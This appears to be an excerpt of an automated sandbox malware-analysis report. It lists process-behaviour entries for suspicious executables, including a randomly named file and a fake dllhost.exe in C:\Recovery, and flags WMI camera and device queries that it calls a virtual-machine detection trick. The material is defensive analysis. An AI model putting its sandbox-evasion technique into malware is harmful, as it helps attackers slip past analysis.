                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
